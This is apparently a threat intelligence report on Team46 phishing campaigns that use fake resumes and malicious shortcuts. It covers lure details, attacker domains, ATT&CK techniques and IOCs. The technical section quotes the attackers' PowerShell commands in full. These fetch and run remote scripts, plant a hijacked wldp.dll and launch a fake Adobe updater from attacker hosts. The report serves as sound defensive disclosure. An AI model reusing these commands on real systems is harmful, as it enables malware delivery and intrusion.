Attacks by Team46
On September 4, researchers from Doctor Web released an interesting report about the failed attack on the Russian freight rail operator.
We would like to add our findings and additional information about other attacks to this report. We named the group Team46 because the attackers used the domain in their network infrastructure cybers46.team
.
First attack
At the end of February the team Threat Intelligence of the Positive Technologies Security Expertise Center found a letter with the subject Re: Фронтенд-разработчик
. It was sent from the address jobs@rabotnik.today
and disguised as a front-end developer's resume.
The randomly written phone number in the signature immediately catches the eye. A password-protected archive is attached to the letter Job Application_20240268.rar
which contains the file Job Application.pdf.lnk
the password for the archive (Inna) is indicated in the text of the letter. In addition, the letter contains a link rabotnik.today/resume/7952235986937661.rar
which downloads an archive without a password, containing the same shortcut. A PowerShell script is launched from the shortcut, which downloads another PowerShell script from the link infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu (c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73)
and he downloads the decoy document from the link infosecteam.info/Job%20application.pdf
and the main payload via the link infosecteam.info/base.php
which we were unable to achieve, but it was described by researchers from the company Doctor Web.
The decoy document looks like a resume of a certain Inna Fedorovna Kleblets.
The resume contains several factual errors. The letter was sent in late February 2024, and the date of birth is March 10, 1994, meaning it should show 29 years old, not 30. In addition, the last names Klebletz does not exist in principle.
Initially, the resume included a postal address 8067282501@mail.ru
and then changed to inna.kleblets@mail.ru
. All this, as well as the document metadata, indicate that the file was saved from the hh.ru website and edited in LibreOffice Writer 7.3 on February 7, 2024 at 02:00:00 UTC-05:00, with en-US used as the LibreOffice Writer interface language.
The distinctive feature of this attack is that all the domains used have placeholders, creating the appearance of its legitimacy. Thus, the domain infosecteam.info
belongs to the allegedly Russian company InfoSecTeam.
This may create the appearance that the file is not a real attack, but a pentest. The site pages are clearly machine translated. In addition, the site footer has an error in the address, there is no indication of the house.
The site template is taken from the WordPress template store.
Interestingly, when trying to search for the company name on Google, the first two lines are occupied by the attackers' website, while the real company from the UK, which has the same name, is only in the fourth line.
A similar situation is observed when searching in Yandex.
Domain rabotnik.today
also has a plug.
The site has a Russian version, which also has machine translation.
The attack involves two domains: rabotnik.today
And infosecteam.info
registered on 08.12.2023 and 19.02.2024 respectively. In addition, two more domains were found – cybers46.team
And cybers4646.my.id
which were registered on 06/05/2023 and 06/03/2023 respectively and also resolved to 162.0.236.151, as well as infosecteam.info
. Presumably, they were used to develop the attack, which may indicate that this attack is not the first. By domain cybers46.team
We named the attacking group Team46.
The attack itself was clearly massive: we found almost 4,000 identical shortcuts (but with different victim IDs) in archives in open folders on infosecteam.info
uploaded there within three minutes.
Yandex search suggestions also indicate that people have often encountered the described fake resume.
Second attack
In April, PT Expert Security Center experts also discovered similar malicious shortcuts with the names SCAN_4024_2024_04_02.pdf.lnk
And SCAN_4251_2024_03_25.pdf.lnk
downloaded from the link srv480138.hstgr.cloud/uploads/scan_3824.pdf
another bait document.
The document was created on 26.02.2024 at 12:00:07 UTC+00:00 using Microsoft: Print To PDF with the name Remote Desktop Redirected Printer Doc, which indicates that the attackers accessed the document via the RDP protocol and then printed it in PDF format. Domain Content srv480138.hstgr.cloud
was a complete copy of the site elevation.store
— a beauty store in the UAE. The stub was completely unrelated to the decoy document, but this may indicate that the attackers could also use this server for attacks in the UAE, but there was no confirmation.
Technical analysis of attacks
In the first attack, the shortcut launches powershell.exe with the following command:
-w Minimized -ep Bypass -nop -c "irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | iex"
Each recipient is sent a shortcut with a unique identifier. The shortcut downloads and executes a script with the following content:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'http://infosecteam.info/Job%20application.pdf' -OutFile $env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';$env:LOCALAPPDATA\Temp\102fa066-cc9d-4a80-b3aa-12d5df196b42.pdf; iwr 'http://infosecteam.info/base.php' -OutFile $env:LOCALAPPDATA\Yandex\YandexBrowser\Application\Wldp.dll -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.';"
The script downloads a decoy document and opens it, then downloads a payload that uses DLL Hijacking to replace a system library. wldp.dll
for Yandex Browser. The script uses a string related to the Microsoft Edge browser version 121, released on January 25, 2024, as User-Agent.
The shortcut from the second attack launches powershell.exe with a similar command:
-w Minimized -ep Bypass -nop -c "irm https://srv480138.hstgr.cloud/warning.php?id=efu8crth52xe73hku1whp10h7i2unsnw | iex"
The identifier is also unique for each target. The shortcut downloads and executes the script:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -w Minimized -ep Bypass -nop -c "iwr 'https://srv480138.hstgr.cloud/uploads/scan_3824.pdf' -OutFile $env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.';$env:LOCALAPPDATA\Temp\399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf;iwr 'https://srv480138.hstgr.cloud/report.php?query=$env:COMPUTERNAME' -OutFile $env:LOCALAPPDATA\Temp\AdobeUpdater.exe -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.1 YaBrowser/23.11.0.0 Safari/537.36';$env:LOCALAPPDATA\Temp\AdobeUpdater.exe;"
In this case, the payload is disguised as an Adobe Reader update. Here, the User-Agent is a string that already belongs to the Microsoft Edge browser version 120, released on December 7, 2023, although this attack was performed later. All shortcuts were created and modified on 11/15/2023 at 11:12:27 UTC. But in the first attack, the computer name is desktop-420!69j
username — Putin[REDACTED]
and in the second the computer name is desktop-819jaxj
username is IgornWay. The second username looks like a case-insensitive replacement of the first one. Such differences in metadata and the User-Agent string may indicate that there is not just one person behind the attacks, but a group of people.
Conclusion
There is still a lack of additional context to clearly attribute the attackers and their true motives. However, judging by the level of preparation and the organizations that were attacked by the hackers, we can say that we are dealing with an APT group.
We continue to monitor the activity of the Team46 group and expect new attacks from them.
Team46 TTPs according to the MITRE ATT&CK matrix
ID | Name | Description |
Reconnaissance | ||
T1589.002 | Gather Victim Identity Information: Email Addresses | Team46 sent targeted phishing emails to leaked email addresses |
Resource Development | ||
T1583.001 | Acquire Infrastructure: Domains | Team46 registered several domain names to give the links a legitimate look through the registrar Namecheap |
T1583.003 | Acquire Infrastructure: Virtual Private Server | Team46 purchased a VPS from Hostinger and used a technical subdomain on hstgr.cloud |
T1583.004 | Acquire Infrastructure: Server | Team46 hosted servers on Namecheap |
T1585.002 | Establish Accounts: Email Accounts | Team46 used the address to make the letters look legitimate |
T1608.005 | Stage Capabilities: Link Target | Team46 used its own servers to host archives with malicious shortcuts |
Initial Access | ||
T1566.001 | Phishing: Spearphishing Attachment | Team46 sent targeted phishing emails with an attached RAR archive, password protected and containing a malicious shortcut to avoid detection by the email gateway |
T1566.002 | Phishing: Spearphishing Link | Team46 also used links to a RAR archive without a password in targeted phishing emails, but containing the same malicious shortcut. |
Execution | ||
T1059.001 | Command and Scripting Interpreter: PowerShell | Team46 uses PowerShell scripts to download staging and main payloads |
T1204.001 | User Execution: Malicious Link | Team46 tries to trick users into downloading an archive with a malicious shortcut via a link delivered via a phishing email |
T1204.002 | User Execution: Malicious File | Team46 tries to trick users into opening a malicious shortcut delivered via a phishing attachment |
Persistence | ||
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | To secure the system, Team46 used a substitution of wldp.dll in the Yandex Browser folder |
Defense Evasion | ||
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | To execute the payload, Team46 used a substitution of wldp.dll in the Yandex Browser folder, which allowed it to bypass the sandbox |
IOCs
File indicators
File name | MD5 | SHA1 | SHA256 |
Job Application_20240268.rar | 8fedb5dae41ad563f2276b90930aa341 | a35a21776eb16ed904ba09dd76a5f6dddd7aee98 | c801243a2e14b64ed1d87feef9ce6298d90d72eb2bbff3994d868424c2a2346c |
Job Application.pdf.lnk | c0df1e743bcc016245de4731fb7220b9 | e59284d6677ede89d525491956258d29cd83c59f | 823d625481fe8b0299850e9758e43b717b6874d42e0112f1b8281bcefedadd31 |
7952235986937661.rar | be930ec5fe56fce7abca7df85cb8fecb | 61b99ca03d7f2d19279e53a9e53b31eec49f5bc0 | c101e1f8b4bb6b498ab99a4cf7fd9e62a4126be16409effa379c4f78194b5707 |
ps1 | 760550ef574cc8f660314a3bf7c21a9d | dca725b40e8f5ba28cd78d285c0e6c77f6b96996 | c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73 |
scan_3824.pdf | 92c0e50193bfc15d29128d41e689625b | e4592319b8c7ed0c6859eac490f52a428b26410b | 62248642faaf84400a23b14c50fdf2ea37ece82262fd344963fbd57bd49973c7 |
Job application.pdf | 9ab5785378bf723844a0eea7f42a5084 | d77657f52745b3b9331dd55a431a59ac135cac64 | e92ad395f945596ff4e1afaf852119046f663285e4a79792c4db2cf97a2a8f61 |
Network indicators
rabotnik.today
infosecteam.info
cybers46.team
cybers4646.my.id
srv480138.hstgr.cloud
162.0.236.151
203.161.60.229
149.100.138.167
Stanislav Pyzhov
Senior Specialist, Complex Threat Research Group, Positive Technologies Security Expert Center
Denis Kuvshinov
Head of the Threat Intelligence Department of the Positive Technologies Security Expertise Center